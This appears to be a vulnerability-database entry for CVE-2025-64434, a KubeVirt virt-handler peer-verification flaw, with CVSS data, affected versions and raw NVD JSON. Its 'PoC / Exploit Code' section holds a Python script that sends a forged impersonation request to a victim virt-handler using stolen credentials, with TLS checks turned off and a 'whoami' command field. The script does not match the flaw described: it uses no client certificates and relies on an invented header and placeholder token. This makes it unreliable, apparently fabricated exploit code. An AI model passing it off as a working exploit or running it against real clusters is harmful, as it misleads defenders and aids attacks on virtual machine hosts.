Security Vulnerability Report
CVE-2025-64434 CVSS 4.7 MEDIUM

CVE-2025-64434

Published: 2025-11-07 23:15:46
Last Modified: 2025-11-25 17:05:28

Description

KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances, potentially compromising the integrity and availability of the VMs managed by them. This vulnerability is fixed in 1.5.3 and 1.6.1.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:* - VULNERABLE
cpe:2.3:a:kubevirt:kubevirt:1.6.0:*:*:*:*:kubernetes:*:* - VULNERABLE
KubeVirt < 1.5.3
KubeVirt < 1.6.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64434 PoC - KubeVirt virt-handler authentication bypass
# The attacker must first compromise one virt-handler instance, then use the shared credentials to impersonate virt-api
import requests
import json

# Configuration
VICTIM_VIRTHANDLER = "https://<victim-virthandler-ip>:8443"
ATTACKER_VIRTHANDLER = "https://<attacker-virthandler-ip>:8443"
KUBEVIRT_API = "https://kubevirt-api:443"


# Step 1: obtain the credentials of the compromised virt-handler
def get_stolen_credentials():
    """
    Assumes the attacker has already compromised a virt-handler instance through another vulnerability
    and extracts the shared service account credentials from it
    """
    # In a real scenario these would be read from the compromised virt-handler
    return {
        'token': 'stolen_service_account_token',
        'ca_cert': 'path_to_ca_cert'
    }


# Step 2: build a request that impersonates virt-api
def craft_impersonation_request(credentials):
    """
    Use the shared credentials to build a malicious request impersonating virt-api
    with the goal of performing privileged operations against other virt-handlers
    """
    headers = {
        'Content-Type': 'application/json',
        'Authorization': f'Bearer {credentials["token"]}',
        'X-Virt-Api-Impersonation': 'true'  # impersonation marker
    }
    # Build the malicious request - attempt to trigger a virtual machine operation
    payload = {
        'action': 'trigger_vm_migration',
        'target_virthandler': 'https://target-virthandler:8443',
        'vm_id': 'target-vm-uuid',
        'malicious_command': 'whoami'
    }
    return headers, payload


# Step 3: send the malicious request
def exploit(headers, payload):
    """
    Send the impersonating request to the target virt-handler
    Because of the verifyPeerCert verification flaw, the request may be trusted
    """
    target_url = f"{VICTIM_VIRTHANDLER}/apis/kubevirt.io/v1/namespaces/*/virtualmachineinstances/*"
    response = requests.post(target_url, headers=headers, json=payload, verify=False)
    return response


# Main entry point
if __name__ == "__main__":
    print("CVE-2025-64434 KubeVirt virt-handler Impersonation PoC")
    credentials = get_stolen_credentials()
    headers, payload = craft_impersonation_request(credentials)
    response = exploit(headers, payload)
    print(f"Response Status: {response.status_code}")
    print(f"Response Body: {response.text}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64434", "sourceIdentifier": "[email protected]", "published": "2025-11-07T23:15:45.690", "lastModified": "2025-11-25T17:05:28.493", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the VM managed by it. This vulnerability is fixed in 1.5.3 and 1.6.1."}, {"lang": "es", "value": "KubeVirt es un complemento de gestión de máquinas virtuales para Kubernetes. Antes de las versiones 1.5.3 y 1.6.1, debido a la lógica de verificación de pares en virt-handler (a través de verifyPeerCert), un atacante que comprometiese una instancia de virt-handler podría explotar estas credenciales compartidas para suplantar a virt-API y ejecutar operaciones privilegiadas contra otras instancias de virt-handler, comprometiendo potencialmente la integridad y disponibilidad de la máquina virtual gestionada por esta. Esta vulnerabilidad está corregida en las versiones 1.5.3 y 1.6.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*", "versionEndExcluding": "1.5.3", "matchCriteriaId": "D06A16D0-A19D-4FC9-BBB2-DD155157AD8E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:kubevirt:kubevirt:1.6.0:*:*:*:*:kubernetes:*:*", "matchCriteriaId": "78254CFF-E38D-4C0A-AB4B-3F41FCBB2A3C"}]}]}], "references": [{"url": "https://github.com/kubevirt/kubevirt/commit/231dc69723f331dc02f65a31ab4c3d6869f40d6a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/kubevirt/kubevirt/commit/af2f08a9a186eccc650f87c30ab3e07b669e8b5b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/kubevirt/kubevirt/commit/b9773bc588e6e18ece896a2dad5336ef7a653074", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-ggp9-c99x-54gp", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}